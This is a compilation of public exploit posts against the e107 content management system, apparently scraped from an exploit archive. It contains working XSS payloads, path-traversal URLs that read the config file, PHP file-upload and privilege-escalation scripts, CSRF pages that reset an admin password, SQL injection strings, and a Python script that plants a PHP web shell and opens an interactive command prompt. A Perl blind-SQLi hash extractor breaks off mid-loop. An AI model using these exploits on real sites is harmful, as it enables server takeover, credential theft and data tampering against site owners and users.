Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close

Response:
HTTP/1.1 200 OK
Date: Thu, 04 May 2023 03:07:35 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "37f107dbe6a998ecf7b71689627c2a56"
Content-Length: 12420
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: hacked">bbbbb</title>
<meta charset='utf-8' />
<meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
<!-- *CSS* -->
[...]
<div id="uploader" data-max-size="2mb" rel="/e107/e107_web/js/plupload/upload.php?for=_commonh5it1"><img src=a onerror=alert(1)>dezaw&path=">
	        <p>No HTML5 support.</p>
		</div>
[...]

# POC 2

URL: http://127.0.0.1/e107/e107_admin/newspost.php
Parameters: Payload in URL

Request:
GET /e107/e107_admin/newspost.php/sdd4h"><script>alert(1)</script>kzb89?mode=main&action=list HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=ftq2gnr1kgjqhfa3u902thraa8
Connection: close

Response:




HTTP/1.1 200 OK
Date: Fri, 05 May 2023 06:21:53 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "d127dd6a44a22e093fed60b83bf36af2"
Content-Length: 72914
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html lang="en">
<head>
<title>News - List - Admin Area :: hacked">bbbbb</title>
<meta charset='utf-8' />
<meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
<!-- *CSS* -->
[...]
<a class="btn btn-default btn-secondary nextprev-item next " href="http://127.0.0.1/e107/e107_admin/newspost.php/sdd4h">
<script>alert(1)</script>kzb89/?mode=main&action=list&from=10" title="Go to the next page" ><i class="fa fa-forward"></i></a>
[...]
HireHackking 
source: https://www.securityfocus.com/bid/54096/info

The Image Gallery Plugin for e107 is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in further attacks.

Image Gallery 0.9.7.1 is vulnerable; other versions may also be affected. 

http://www.example.com/e107_plugins/image_gallery/viewImage.php?name=../../../../e107_config.php&type=album
HireHackking 
source: https://www.securityfocus.com/bid/54091/info

The Hupsi_fancybox Plugin for e107 is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Hupsi_fancybox 1.0.4 is vulnerable; other versions may also be affected. 

PostShell.php
<?php

$uploadfile="lo.php";

$ch = curl_init("http://www.example.com/e107/e107_plugins/hupsi_fancybox/uploader/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,
               array('Filedata'=>"@$uploadfile",
          'username'=>'test',
          'folder'=>'/e107/e107_plugins/hupsi_fancybox/uploader/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
   
print "$postResult";

?>
HireHackking 
source: https://www.securityfocus.com/bid/54098/info

The FileDownload Plugin for e107 is prone to an arbitrary file-upload vulnerability and a remote file-disclosure vulnerability because the application fails to adequately sanitize user-supplied input.

An attacker can exploit these issues to upload a file and view local files in the context of the web server process, which may aid in further attacks.

FileDownload 1.1 is vulnerable; other versions may also be affected. 

PostShell.php
<?php

$ch = curl_init("http://www.example.com/e107/e107_plugins/filedownload/filedownload/file_info/admin/save.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,
               array('filename'=>'lo.php',
          'accesses'=>'<?php phpinfo(); ?>'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
   
print "$postResult";

?>

http://www.example.com/e107/e107_plugins/filedownload/filedownload/file_info/admin/edit.php?file=../../../../../e107_config.php%00
HireHackking 
# Exploit Title: e107 CMS v3.2.1 - Multiple Vulnerabilities
# Date: 30/04/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 3.2.1
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### XSS Reflected - Via adding comment (Authenticated)

# POC
Request:
GET /e107/news.php/fnzi4'onchange='alert(1)'?extend.1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: e107_tzOffset=-60; PHPSESSID=2ju9huul2lsl7565jpre0f2g40

Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 08:02:42 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "71d7966eaa95fd8ac14da8baf3e0785d"
Content-Length: 25059
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
[...]
<div class='media' >
<form id='e-comment-form' method='post' action='/e107/news.php/fnzi4'onchange='alert(1)'?extend.1'  >
[...]

User click to comment in news, writes any character in the comment field, and clicks elsewhere outside the comment field

image.png


### Upload restriction bypass (Authenticated [Admin]) + Stored Xss.

Account with administrative privileges can bypass upload image restriction (XSS Stored from .svg file)
image->media manager->upload a file->Image/File URL
admin can upload SVG from localhost ->http://127.0.0.1:8070/xxe_svg2.svg

# POC

Request:
POST /e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img
Cookie: e107_tzOffset=-60; PHPSESSID=t656bpkef7ndqm0p8j9ddf9atl
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fxxe_svg2.svg&upload_remote_url=1&upload_caption=

Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 02:06:14 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "06ed5ef56b0f736995112cafd77e9ec0"
Content-Length: 20878
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr
[...]
<div class='well clearfix media-carousel-item-container'>
<a data-toggle='context' data-bs-toggle='context' class='e-media-select  '  data-id='' data-width='0' data-height='0' data-src='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-type='image' data-bbcode='img' data-target='' data-path='{e_MEDIA_IMAGE}2021-12/xxe_svg2.svg' data-preview='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg'  data-preview-html='PGltZyBjbGFzcz0iaW1nLXJlc3BvbnNpdmUgaW1nLWZsdWlkIiBzcmM9Ii9lMTA3L2UxMDdfbWVkaWEvNDE2ZjQ2MDJlMy9pbWFnZXMvMjAyMS0xMi94eGVfc3ZnLnN2ZyIgYWx0PSJ4eGVfc3ZnLnN2ZyIgc3Jjc2V0PSIvZTEwNy9lMTA3X21lZGlhLzQxNmY0NjAyZTMvaW1hZ2VzLzIwMjEtMTIveHhlX3N2Zy5zdmcgMngiIHdpZHRoPSIyMTAiIGhlaWdodD0iMTQwIiAgLz4=' title="xxe_svg2.svg ()" style='' href='#' ><span><img class="img-responsive img-fluid" alt="" src="/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg" style="display:inline-block" /></span>
</a>
[...]

image.png


### Upload restriction bypass (Authenticated [Admin])+RCE

Upload and execute .PHP file
Attacker must upload file to ../../../ to parent directory, due to fact that somehow application user can only execute PHP code when uploading to parent directory.

image.png


Media Manager-> Media Upload/Import -> From a remote location

# POC

Request
POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import
Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Fcmd.php

Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 09:02:08 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "5b9621fc78893e36034b14f841f840f8"
Content-Length: 26075
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr
[...]

We can see uploaded PHP file on the server side.

image.png


cmd.php file source:

<?php
system('whoami');
?>

image.png


### Upload restriction bypass (Authenticated [Admin])+ Server file override

Attacker can override example top.php file in the main directory of web application.
Original file top.php in server:
image.png


We can override file via following upload functionality:
Media Manager-> Media Upload/Import -> From a remote location

# POC

Request:
POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import
Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Ftop.php

Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 09:20:10 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "5b9621fc78893e36034b14f841f840f8"
Content-Length: 26075
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
[...]

top.php file content was tampered:
HireHackking 
# Exploit Title: e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 21-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 2.3.0
# Category: Webapps
# Tested on: Linux/Windows

# e107 is a free website content management system
# Includes an endpoint that allows remote access
# Theme page is misconfigured, causing security vulnerability
# User information with sufficient permissions is required.
# The contents of the upload "malicious.zip" file must be too long to read to bypass some security measures!

# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
#		   python3 exploit.py -h


from time import sleep
import requests
import argparse


def main():
	parser = argparse.ArgumentParser(
		description='e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)'
	)
	parser.add_argument('-u', '--host', type=str, required=True)
	parser.add_argument('-l', '--login', type=str, required=True)
	parser.add_argument('-p', '--password', type=str, required=True)
	args = parser.parse_args()
	print("\ne107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)",
		  "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
	host(args)



def host(args):
	#Check http or https
	if args.host.startswith(('http://', 'https://')):
		print("[?] Check Url...\n")
		sleep(2)
		args.host = args.host
		if args.host.endswith('/'):
			args.host = args.host[:-1]
		else:
			pass
	else:
		print("\n[?] Check Adress...\n")
		sleep(2)
		args.host = "http://" + args.host
		args.host = args.host
		if args.host.endswith('/'):
			args.host = args.host[:-1]
		else:
			pass


	# Check Host Status
	try:
		response = requests.get(args.host)
		if response.status_code != 200:
			print("[-] Address not reachable!")
			sleep(2)
			exit(1)
		else:
			check(args)

	except requests.ConnectionError as exception:
		print("[-] Address not reachable!")
		sleep(2)
		exit(1)



def check(args):
	response = requests.get(args.host + "/e107_themes/payload/payload.php?cmd=whoami")
	if response.status_code == 200:
		print("[*] Exploit File Exists!\n")
		sleep(2)
		exploit(args)
	else:
		login(args)



def login(args):
	url = args.host + "/e107_admin/admin.php"
	headers = {
		"Cache-Control": "max-age=0",
		"Upgrade-Insecure-Requests": "1",
		"Origin": args.host,
		"Content-Type": "application/x-www-form-urlencoded",
		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
		"Referer": args.host + "/e107_admin/admin.php",
		"Accept-Encoding": "gzip, deflate",
		"Accept-Language": "en-US,en;q=0.9",
		"Connection": "close"
	}
	data = {"authname": args.login, "authpass": args.password, "authsubmit": "Log In"}
	response = requests.post(url, headers=headers, data=data, allow_redirects=False)
	new_cookie = response.cookies.get("MySi_cookieSID")
	if (response.headers.get("Location") == "admin.php?failed"):
		print("[-] Login Failed...\n")
		print("Your username or password is incorrect.")
		sleep(2)
		exit(1)
	else:
		print("[+] Success Login...\n")
		sleep(2)
		install(args, new_cookie)



def install(args, new_cookie):
	url = args.host + "/e107_admin/theme.php"
	cookies = {
		"MySi_cookieSID": new_cookie,
		"e107_tzOffset": "-180"}
	headers = {
		"Cache-Control": "max-age=0",
		"Upgrade-Insecure-Requests": "1",
		"Origin": args.host,
		"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary",
		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
		"Referer": args.host + "/e107_admin/theme.php?mode=main&action=upload",
		"Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9",
		"Connection": "close"
	}
	data = "------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n2097152\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"ac\"\r\n\r\n005cd2159fa5342883b18a46726a908d\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"file_userfile[]\"; filename=\"payload.zip\"\r\nContent-Type: application/zip\r\n\r\nPK\x03\x04\x14\x03\x00\x00\x00\x00\xf9|5S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00payload/PK\x03\x04\x14\x03\x00\x00\x08\x00\xc2\x845S\xb1\xa6\xeeb>\x00\x00\x00M\x00\x00\x00\x13\x00\x00\x00payload/payload.php\xb3\xb1/\xc8(P\xc8L\xd3\xc8,.N-\xd1P\x89ww\r\x89VO\xceMQ\x8f\xd5\xd4\xacVP\x01\xb2\x14l\x15P\xc5\xad\x15\x8a+\x8bKRs5@\xb2@^Jf\xaa\xb5B\xad\x82\xbd\x1d\x00PK\x01\x02?\x03\x14\x03\x00\x00\x00\x00\xf9|5S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00$\x00\x00\x00\x00\x00\x00\x00\x10\x80\xedA\x00\x00\x00\x00payload/\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x00\xaf\x9b\xc4\xe5\xae\xd7\x01\x80E4\xc5\xe5\xae\xd7\x01\x00\xaf\x9b\xc4\xe5\xae\xd7\x01PK\x01\x02?\x03\x14\x03\x00\x00\x08\x00\xc2\x845S\xb1\xa6\xeeb>\x00\x00\x00M\x00\x00\x00\x13\x00$\x00\x00\x00\x00\x00\x00\x00 \x80\xa4\x81&\x00\x00\x00payload/payload.php\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x80/\x99\xe6\xed\xae\xd7\x01\x008\xa1x\xee\xae\xd7\x01\x80/\x99\xe6\xed\xae\xd7\x01PK\x05\x06\x00\x00\x00\x00\x02\x00\x02\x00\xbf\x00\x00\x00\x95\x00\x00\x00\x00\x00\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\n1\r\n------WebKitFormBoundary--\r\n"
	response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)

	if (response.status_code == 301):
		print("[!] Unauthorized user!\n\n")
		print("Requires user with add theme permissions.")
		sleep(2)
		exit(1)
	else:
		print("[!] Upload Vuln File!\n")
		sleep(2)
		exploit(args)



def exploit(args):
	print("[+] Exploit Done!\n")
	sleep(2)

	while True:
		cmd = input("$ ")
		url = args.host + "/e107_themes/payload/payload.php?cmd=" + cmd
		headers = {
			"Upgrade-Insecure-Requests": "1",
			"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
		}

		response = requests.post(url, headers=headers, timeout=5)

		if response.text == "":
			print(cmd + ": command not found\n")
		else:
			print(response.text)

if __name__ == '__main__':
	main()
HireHackking

e107 CMS 2.3.0 - CSRF 

# Exploit Title: e107 CMS 2.3.0 - CSRF
# Date: 04/03/2021
# Exploit Author: Tadjmen
# Vendor Homepage: https://e107.org
# Software Link: https://e107.org/download
# Version: 2.3.0
# Tested on: Windows 10
# CVE : CVE-2021-27885

CSRF vulnerability on e107 CMS

## Bug Description
Hi. I found a CSRF on the e107 CMS. Hacker can change password any user click the link.

## How to Reproduce
Steps to reproduce the behavior:
1. Create a CSRF login POC using the following code.

```
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Cross Site Request Forgery (Edit Existing Admin details)</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
    var count = 2;
    var i=0;

    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
    }
}

</script>

<H2>Cross Site Request Forgery (Edit Existing Admin details)</H2>

<form method="POST" name="form0" action="
http://localhost/[path-to-e107-cms]/usersettings.php">

<input type="hidden" name="loginname" value="admin"/>
<input type="hidden" name="email" value="[email]"/>
<input type="hidden" name="password1" value="[password]"/>
<input type="hidden" name="password2" value="[password]"/>
<input type="hidden" name="hideemail" value="1"/>
<input type="hidden" name="image" value=""/>
<input type="hidden" name="signature" value=""/>
<input type="hidden" name="updatesettings" value="Save settings"/>
<input type="hidden" name="_uid" value="2"/>




</form>

</body>
</html>
```


2. Replace the email and password with the valid credentials.
3. Send the link script to the victim (admin) to make them click.
4. Login with new admin password
HireHackking 
<!--
==========================
Title:Mutiple CSRF vulnerabilities in e107 CMS 2.1.4
Author:Zhiyang Zeng

Product:
—————
e107 is a powerful website content management system designed for bootstrap v3 from http://e107.org/get-started
—————

Fix
—————
Fixed in git source code https://github.com/e107inc/e107/commit/7a3e3d9fc7e05ce6941b9af1c14010bf2141f1a5
—————

Summary
————
e107 CMS version 2.1.4 is vulnerable to cross-site request forgery in plugin-installing,meta-changingand settings-changing,a malicious web page can use
forged requests to make e107 download and install a plug-in provided by the attacker.
————

Timeline
———
2017-03-01   report to vendor
2017-03-02  GitHub commit to fix token missing
———

 Reproduce:
==========
I just give a uninstall any plugins POC.

vul address:http://127.0.0.1/e107_2.1.4_full/e107_admin/plugin.php

POC:
-->

<form action="http://127.0.0.1/e107_2.1.4_full/e107_admin/plugin.php?uninstall.8" method="post">
<input type="text" name="delete_tables" value="1">
<input type="text" name="delete_ipool" value="1">
<input type="text" name="delete_files" value="0">
<input type="text" name="uninstall_confirm" value="Confirm uninstall">
<input type="submit" name="submit">
</form>

<!--
Description:
I try to uninstall plugin  gallery which id is 8.

visiting beyond POC page, you will find gallery plugin has been uninstalled success!
===========
-->
HireHackking 
# Exploit Title: e107 CMS 2.1.2 Privilege Escalation
# Date: 09-11-2016
# Software Link: http://e107.org/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
 
1. Description

Datas from `$_POST['updated_data']` inside `usersettings.php` are not properly validated so we can set `user_admin`.

http://security.szurek.pl/e107-cms-211-privilege-escalation.html

2. Proof of Concept

<?php

/**
 * e107 CMS 2.1.2 Privilege Escalation
 * Kacper Szurek
 * http://security.szurek.pl
 */
function hack($url, $login, $pass, $cookie){

	$ckfile = dirname(__FILE__) . $cookie;
	$cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
	curl_setopt($ch, CURLOPT_TIMEOUT, 10);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('username' => $login, 'userpass' => $pass, 'userlogin' => 'Sign In')));
	curl_setopt($ch, CURLOPT_POST, 1);
	$content = curl_exec($ch);
	if (strpos($content, '?logout') === false) {
		die("Cannot login");
	}

	$data = array();
	$data['user_admin'] = 1;
	$data['user_perms'] = 0;
	$data['user_password'] = md5($pass);

	curl_setopt($ch, CURLOPT_URL, $url.'/usersettings.php');
	curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('SaveValidatedInfo' => 1, 'updated_data' => base64_encode(serialize($data)), 'updated_key' => md5(serialize($data)), 'currentpassword' => $pass)));
	$content = curl_exec($ch);

	if (strpos($content, 'Settings updated') === false) {
		die("Exploit probably failed");
	}

	die('OK!');
}

$url = "http://url_here";

// Standard user credentials 
$user = "login_here";
$pass = "password_here";

$cookie = "/cookie.txt";
hack($url, $user, $pass, $cookie);
HireHackking 
 _____       _____  ______
|  _  |     |  _  ||___  /
| |/' |_  __| |_| |   / / 
|  /| \ \/ /\____ |  / /  
\ |_/ />  < .___/ /./ /   
 \___//_/\_\\____/ \_/    
                        by bl4ck s3c


# Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability
# Date: 03-01-2014
# Google Dork : Proudly powered by e107 
# Exploit Author: Ahmet Agar / 0x97
# Version: 2.0.0
# Vendor Homepage: http://e107.org/
# Tested on: OWASP Mantra & Iceweasel
 
# Vulnerability Description:

CMS user details section is vulnerable to XSS. You can run XSS payloads.

XSS Vulnerability #1:

Go Update user settings page

"http://{target-url}/usersettings.php"

Set Real Name value;

"><script>alert(String.fromCharCode(88, 83, 83))</script>

or

"><script>alert(document.cookie)</script>


========
Credits:
========
 
Vulnerability found and advisory written by Ahmet Agar.
 
===========
References:
===========
 
http://www.0x97.info
htts://twitter.com/_HacKingZ_
HireHackking 
source: https://www.securityfocus.com/bid/52821/info

e107 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

e107 1.0.0 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?option=com_flexicontent&view=[Sql]
HireHackking 
source: https://www.securityfocus.com/bid/47750/info

e107 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

e107 0.7.25 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/news.php?extend.9999999%0aAND%0aSUBSTRING(@@version,1,1)=5
HireHackking 
source: https://www.securityfocus.com/bid/50339/info

e107 is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied input.

An attacker can exploit this issue to execute arbitrary commands within the context of the vulnerable application.

e107 0.7.24 is vulnerable; other versions may also be affected. 

http://www.example.com/e107_config.php?cmd=id
HireHackking 
#!/usr/bin/perl
#
#
# e107 <= 2.1.4 "keyword" Blind SQL Injection Exploit
#
# --------------------------------------------------------------------------
# [*] Discovered by staker - staker[at]hotmail[dot]it 
# [*] Discovered on 09/03/2017
# [*] Site Vendor: http://www.e107.org
# [*] BUG: Blind SQL Injection
# --------------------------------------------------------------------------
#
#
# Description
# -------------------------------------------------------------------------
# e107 contains one flaw that allows an attacker to carry out an SQL
# injection attack. The issue is due to the "e107_plugins/pm/pm.php" script 
# not properly saniting user-supplied input to the "keyword" POST variable
# This may allow an attacker to inject or manipulate sql queries in
# the backend database regardless of php.ini settings
# -------------------------------------------------------------------------
# SHORT EXPLANATION
# -----------------------------------
# 
# FILE:  "e107_handlers/core_functions.php"
#
# 76. function vartrue(&$val, $default='')                     
# 77. {
# 78.   if (isset($val) && $val) { return $val; } {1} <--- variable is not sanized to be sent at the mysql database
# 79.    return $default;
# 80.}
#
# ----------------------------------
#
# FILE: "e107/e107_plugins/pm/pm.php"
#
# 
# 35. if(vartrue($_POST['keyword']))   {2}<--- if $_POST keyword variable is set, then e107 starts pm_user_lookup() function.
# 36. {
# 37.   pm_user_lookup();
# 38.}
#
#
#
# 615. function pm_user_lookup()
# 616. {
# 617.  $sql = e107::getDb();
# 618.
# 619. $query = "SELECT * FROM #user WHERE user_name REGEXP '^".$_POST['keyword']."' "; {3} <---- variable not sanized
# 620. if($sql->gen($query))
# 621. {
# 622. echo '[';
# 623  while($row = $sql->fetch())
# 624. {
# 625.   $u[] =  "{\"caption\":\"".$row['user_name']."\",\"value\":".$row['user_id']."}";
# 626. }
# 627.
# 628.  echo implode(",",$u);
# 629.  echo ']';
# -----------------------------------
#
#
# use your brain..
#
# Greetz to: Warwolfz Crew,
# meh, Dante90, SHADES MASTER and nexen
#
# -- 0gay --
#
# -----------------------------------
# YOUR MOM IS NOT SAFE ANYMORE!!
# CALL HER!!
# -----------------------------------



use strict;
use IO::Socket::INET;
use LWP::UserAgent;


        

my ($URL,$uid) = @ARGV;
my @chars = (8..122);
my ($i,$ord,$hash) = (1,undef,undef);





if (@ARGV != 2) { usage(); } 


$URL = parse::URL($URL);


syswrite (STDOUT,"[-] Crypted Password: ");


for ($i=0;$i<=60;$i++) 
{
             			
   foreach $ord (@chars) 
   { 
             
      if (e107::Query(sql($i,$ord),$URL) == 666 ) 
	  {  
	      syswrite (STDOUT,chr($ord));
		  $hash .= chr($ord);
		  last;
	  }
	  if ($i == 2 and not defined $hash) 
	  {
	     syswrite (STDOUT,"\n[-] Exploit Failed");
		 exit;
	  }	 
